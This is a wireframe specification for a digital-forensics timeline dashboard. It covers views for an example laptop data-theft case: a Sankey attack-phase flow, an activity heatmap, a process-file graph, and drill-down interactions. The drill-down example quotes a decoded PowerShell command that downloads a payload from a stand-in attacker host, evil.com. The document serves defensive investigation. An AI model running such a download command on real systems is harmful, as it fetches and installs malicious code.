# Timeline Visualization Wireframe - Complete Multi-View Dashboard

## Main Timeline View with Integrated Analytics

```
+====================================================================================================+
|  TAB: TIMELINE  |  ARTIFACTS  |  REPORT  |  SETTINGS                                              |
+====================================================================================================+
|  [Case: R&D-Laptop-001]  [UTC ▾]  [Time Window: 2025-03-01 .. 2025-03-07]  [Filters ▾]  [Export]  |
+----------------------------------------------------------------------------------------------------+
| Filters Panel (collapsible)                                                                         |
| ┌────────────────────────────────────────────────────────────────────────────────────────────────┐ |
| | Event Class: [☑ USER] [☑ EXEC] [☑ STAGING] [☑ EXFIL] [☑ COVERUP] [ ] OTHER                  | |
| | Event IDs: 4624, 4625, 1102 | Keyword: [ powershell ] | Path contains: [ \Windows\Prefetch ]  | |
| | User: [ Any ]  Source: [EVTX/REG/PF/MFT/Browser]  Severity: [1-5]  Reset[ ] Apply[ ]          | |
| └────────────────────────────────────────────────────────────────────────────────────────────────┘ |
+----------------------------------------------------------------------------------------------------+
| Left: Attack Flow (Sankey)                              | Right: Vertical Timeline                 |
| ┌─────────────────────────────────────────────────────┐ | ┌──────────────────────────────────────┐ |
| |  INITIAL ACCESS ────┐                               | |  TIME  ↓                              | |
| |                     ├──────── EXECUTION ─────────┐  | |  00:41 ┃ USER     │ Explorer opened   | |
| |                     |                            │  | |  00:43 ┃ EXEC     │ winzip.exe (PF)   | |
| |                     |           ┌── STAGING ─────┼──| |  00:44 ┃ STAGING  │ 2472 MFT writes   | |
| |                     |           |                │  | |  00:45 ┃ EXFIL    │ curl.exe (PF)     | |
| |                     |           |       ┌─ EXFIL─┼──| |  00:45 ┃ EXFIL    │ \\10.99.1.4\TEMP  | |
| |                     |           |       |        │  | |  00:47 ┃ COVERUP  │ EventID 1102      | |
| |                     |           └───────┼────────┘  | |  00:48 ┃ COVERUP  │ chimera.zip del   | |
| |                     └─────────── COVERUP            | |  00:49 ┃ SYSTEM   │ EventID 6008      | |
| |                                                     | |                                          | |
| | Lane widths = event counts;                         | | [Find ▾]  [Group by: minute ▾]          | |
| | hover: shows counts & % per phase/path.            | |                                          | |
| └─────────────────────────────────────────────────────┘ | └──────────────────────────────────────┘ |
+----------------------------------------------------------------------------------------------------+
| Event Details (on row click)                                                                        |
| ┌────────────────────────────────────────────────────────────────────────────────────────────────┐ |
| | Timestamp (UTC): 2025-03-02T00:45:12Z   Local: 2025-03-02 06:15:12                               | |
| | Class: EXFIL  Severity: 4   Source: PF   EventID: (if EVTX)                                      | |
| | Artifact: \Windows\Prefetch\CURL.EXE-12345ABC.pf                                                  | |
| | Evidence: "cURL.exe executed; ShellBags indicates \\10.99.1.4\TEMP"                              | |
| | Hash(artifact): 9a3c…e12  | Provenance: image:E01 path:…                                         | |
| | [Open Raw]  [Copy Hash]  [Add Note]  [Send to Report]                                            | |
| └────────────────────────────────────────────────────────────────────────────────────────────────┘ |
+----------------------------------------------------------------------------------------------------+
| Legend: USER(#E9E9E9)  EXEC(#3C7DD9)  STAGING(#E8C547)  EXFIL(#22B573)  COVERUP(#D64550)  SYSTEM  |
+====================================================================================================+
```

---

## Event Heatmap Calendar View

### Purpose
Identifies attacker active hours and working patterns (when activity peaked)

```
+=====================================================================+
|                         EVENT HEATMAP CALENDAR                      |
+=====================================================================+
| Week 1                                                              |
|   Mon   Tue   Wed   Thu   Fri   Sat   Sun                          |
|00 ███   ██    ░░    ░░█   ░░    ░░    ░░   [Legend:]               |
|01 ███   ███   ██    ░░    ░░    ░░    ░░   ░░ 0-10 events          |
|02 ███   ███   ███   ██    ░░    ░░    ░░   ██ 11-50 events         |
|03 ████  ████  ███   ██    ░░    ░░    ░░   ███ 51-100 events       |
|04 ██░   ███   ██    ██    ░░    ░░    ░░   ████ 101+ events        |
|05 ░░    ░░    ██    ███   ░░    ░░    ░░                           |
|06 ░░    ░░    ██    ███   █░    ░░    ░░   Click cell:             |
|07 ░░    ░░    ░░    ░░    ██    ░░    ░░   → Show events in        |
|08 ░░    ░░    ░░    ░░    ██░   ░░    ░░      that hour            |
|09 ░░    ░░    ░░    ░░    ░░█   ░░    ░░                           |
|10 ░░    ░░    ░░    ░░    ░░    ░░    ░░   Hover:                  |
|11 ░░    ░░    ░░    ░░    ░░    ░░    ░░   → Show count +          |
|12 ░░    ░░    ░░    ░░    ░░    ░░    ░░      top classes          |
|13 ░░    ░░    ░░    ░░    ░░    ░░    ░░                           |
|14 ░░    ░░    ░░    ░░    ░░    ░░    ░░                           |
|15 ░░    ░░    ░░    ░░    ░░    ░░    ░░                           |
|16 ░░    ░░    ░░    ░░    ░░    ░░    ░░                           |
|17 ░░    ░░    ░░    ░░    ░░    ░░    ░░                           |
|18 ░░    ░░    ░░    ░░    ░░    ░░    ░░                           |
|19 ░░    ░░    ░░    ░░    ░░    ░░    ░░                           |
|20 ░░    ░░    ░░    ░░    ░░    ░░    ░░                           |
|21 ░░    ░░    ░░    ░░    ░░    ░░    ░░                           |
|22 ░░    ░░    ░░    ░░    ░░    ░░    ░░                           |
|23 ░░    ░░    ░░    ░░    ░░    ░░    ░░                           |
+=====================================================================+
| Analysis: Peak activity Monday-Thursday 00:00-04:00 UTC            |
| → Suggests attacker in timezone UTC+8 (China) working 8am-12pm     |
| → Friday activity minimal → Suggests human operator (not botnet)   |
+=====================================================================+
```

### Key Insights Provided

| Insight | Forensic Value |
|---------|---------------|
| **Time Zone Inference** | Identify attacker's probable geographic location |
| **Human vs. Automated** | Weekday patterns suggest manual operation |
| **Working Hours** | Helps narrow suspect pool (insider vs. external) |
| **Attack Duration** | Sustained multi-hour attacks vs. hit-and-run |

---

## Process-File Relationship Graph View

### Purpose
Visualize which processes touched which files (reveals malicious execution chains)

```
+================================================================================+
|                     PROCESS ↔ FILE RELATIONSHIP GRAPH                          |
+================================================================================+
         ┌────────┐           writes          ┌────────────────────┐
         │winzip.exe│───────────────────────▶ │ C:\Users\R&D\*.CAD │
         └────┬───┘                           └────────────────────┘
              │                                         │
              │ compresses                              │ source files
              ▼                                         ▼
       ┌──────────┐                              ┌─────────────┐
       │7z.exe     │◀─────────────────────────── │ 2,472 files │
       └────┬─────┘                              └─────────────┘
            │
            │ creates
            ▼
       ┌──────────────┐
       │ chimera.zip  │ (187 MB)
       └────┬─────────┘
            │
            │ exfiltrated by
            ▼
       ┌──────────┐
       │curl.exe   │───────▶ \\10.99.1.4\TEMP   (Network Share)
       └────┬─────┘
            │
            │ deletion attempt
            ▼
     ┌──────────────┐
     │del.exe / pf  │───→ MFT delete entry
     └──────────────┘
+================================================================================+
| Node Types:                                                                    |
| ● Process (executable) = Blue circle                                           |
| ● File (data) = Green rectangle                                                |
| ● Network Location = Orange hexagon                                            |
|                                                                                |
| Edge Types:                                                                    |
| → writes/creates = Solid arrow                                                 |
| ⇢ reads/accesses = Dashed arrow                                                |
| ✕ deletes = Red strikethrough arrow                                            |
|                                                                                |
| Hover on Node: Shows timestamps, hashes, full paths                            |
| Click on Node: Highlights all connected nodes (relationship chain)             |
+================================================================================+
| Graph Analysis:                                                                |
| 🔴 CRITICAL: Classic data exfiltration pattern detected                        |
| → Stage 1: winzip.exe compressed CAD files                                     |
| → Stage 2: 7z.exe created chimera.zip archive                                  |
| → Stage 3: curl.exe transferred to external network share                      |
| → Stage 4: del.exe attempted evidence cleanup                                  |
+================================================================================+
```

### Key Forensic Patterns Revealed

| Pattern | Visualization | Investigation Priority |
|---------|---------------|----------------------|
| **Star Pattern** | One process writes to 100+ files | Potential ransomware encryption |
| **Linear Chain** | Process A → File → Process B → Network | Data exfiltration pipeline |
| **Orphan Nodes** | Processes with no file relationships | Possible in-memory malware |
| **Deletion Clusters** | Many files deleted after short-lived process | Anti-forensics activity |

---

## Attack Phase Flow (Sankey Diagram Detail)

### Purpose
Shows event volume flowing through attack lifecycle phases

```
+================================================================+
|              ATTACK PHASE FLOW (Sankey Diagram)                |
+================================================================+
|                                                                |
| INITIAL ACCESS (47 events) ────────┐                          |
|   ├─ RDP Logon (EventID 4624)  23 │                          |
|   ├─ VPN Connection (EventID 23) 12│                          |
|   └─ Phishing Link (Browser) 12    │                          |
|                                     │                          |
|                                     ├────► EXECUTION (189 evt) │
|                                     │        │                 |
|                                     │        ├─ Powershell 87  |
|                                     │        ├─ CMD.exe 45     |
|                                     │        └─ WScript 57     |
|                                     │        │                 |
|                                     │        ├────► PERSISTENCE (34 evt)
|                                     │        │        │         |
|                                     │        │        ├─ Run Keys 12
|                                     │        │        ├─ Sched Task 15
|                                     │        │        └─ Startup Folder 7
|                                     │        │                 |
|                                     │        ├────► STAGING (2,504 evt)
|                                     │        │        │         |
|                                     │        │        ├─ MFT Writes 2,472
|                                     │        │        ├─ WinZip.exe 18
|                                     │        │        └─ 7z.exe 14
|                                     │        │        │         |
|                                     │        │        ├────► EXFILTRATION (9 evt)
|                                     │        │        │        │  |
|                                     │        │        │        ├─ curl.exe 4
|                                     │        │        │        ├─ Network Share 3
|                                     │        │        │        └─ FTP Upload 2
|                                     │        │        │        │  |
|                                     │        └────────┴────────┴─► COVERUP (14 evt)
|                                                                    │
|                                                                    ├─ EventID 1102 (Clear Logs) 5
|                                                                    ├─ File Deletion 7
|                                                                    └─ Timestomp 2
|                                                                                |
| Lane Width = Event Count                                                      |
| Hover on Flow: Shows event count + percentage                                 |
| Click on Phase: Filters timeline to show only that phase                      |
+================================================================+
```

### Sankey Interpretation

| Visual Feature | Forensic Meaning |
|----------------|------------------|
| **Wide Initial Access Lane** | High-volume brute force or spray attack |
| **Narrow Initial Access Lane** | Targeted attack, single entry point |
| **Execution → Staging Split** | Attacker explored system before data theft |
| **Direct Initial → Exfil** | Smash-and-grab attack (scripted) |
| **Thick Coverup Lane** | Sophisticated attacker attempted cleanup |
| **Thin/Missing Coverup** | Unsophisticated or rushed attacker |

---

## Free Layout Mode Configuration

### Drag-and-Drop Panel Arrangement

```
+========================================+========================================+
| Draggable Panel 1: Timeline            | Draggable Panel 2: Sankey Diagram      |
|                                        |                                        |
| [Grab Handle ≡]                        | [Grab Handle ≡]                        |
| ...                                    | ...                                    |
+========================================+========================================+
| Draggable Panel 3: Heatmap             | Draggable Panel 4: Process Graph       |
|                                        |                                        |
| [Grab Handle ≡]                        | [Grab Handle ≡]                        |
| ...                                    | ...                                    |
+========================================+========================================+
```

### Layout Presets

| Preset | Configuration | Use Case |
|--------|---------------|----------|
| **Timeline Focus** | Timeline 70% + Details 30% | Standard investigation |
| **Visual Analytics** | Sankey 40% + Heatmap 30% + Graph 30% | Attack pattern analysis |
| **Report Mode** | Timeline 50% + Event Details 50% | Documentation phase |
| **Custom** | User-defined drag-and-drop | Advanced analysts |

**Implementation (PyQt6):**
```python
# Enable free layout
self.main_layout.setDragEnabled(True)
self.timeline_dock.setFeatures(QDockWidget.Movable | QDockWidget.Floatable)
self.sankey_dock.setFeatures(QDockWidget.Movable | QDockWidget.Floatable)
self.heatmap_dock.setFeatures(QDockWidget.Movable | QDockWidget.Floatable)
self.graph_dock.setFeatures(QDockWidget.Movable | QDockWidget.Floatable)
```

---

## Timeline Interaction Patterns

### Drill-Down Workflow

```
1. User views timeline (10,000 events)
     ↓
2. User applies filter "powershell" (filters to 247 events)
     ↓
3. User clicks suspicious event (EventID 4688 - PowerShell with encoded command)
     ↓
4. System displays Event Details panel with:
   - Full command line: powershell.exe -enc <base64>
   - Decoded command: Invoke-WebRequest http://evil.com/payload.exe
   - Parent process: explorer.exe (unusual)
   - Artifact hash: 9a3c...
     ↓
5. User clicks "Add Note" → Enters: "Confirmed malicious download via encoded PS"
     ↓
6. User clicks "Send to Report" → Event flagged for final report
```

### Cross-View Linking

| Action | Trigger | Response |
|--------|---------|----------|
| Click Sankey Phase | User clicks "STAGING" lane | Timeline filters to staging events only |
| Click Heatmap Cell | User clicks Tuesday 02:00 | Timeline shows events in that hour |
| Click Graph Node | User clicks "curl.exe" | Timeline highlights all curl.exe execution events |
| Timeline Event Selection | User clicks event in timeline | All views highlight related items |

---

## Performance Optimization

### Lazy Rendering Strategy

```
Timeline Table (500,000 events):
- Only render visible rows (~30 rows at a time)
- Use virtual scrolling (QTableView with model)
- Load data in chunks of 1,000 events

Sankey Diagram:
- Pre-compute phase counts once
- Render SVG/Canvas only on view change
- Cache rendered diagram for reuse

Heatmap Calendar:
- Aggregate events by hour before rendering
- Use color gradient shader (GPU-accelerated)
- Update on zoom/pan only

Process Graph:
- Limit initial nodes to top 50 processes
- Expand on user click (load-on-demand)
- Use force-directed layout with WebGL
```

---

**Document Version:** 1.0  
**Wireframe Type:** Multi-View Timeline Dashboard  
**Last Updated:** November 6, 2025  
**Implementation Framework:** PyQt6 + matplotlib + pyqtgraph
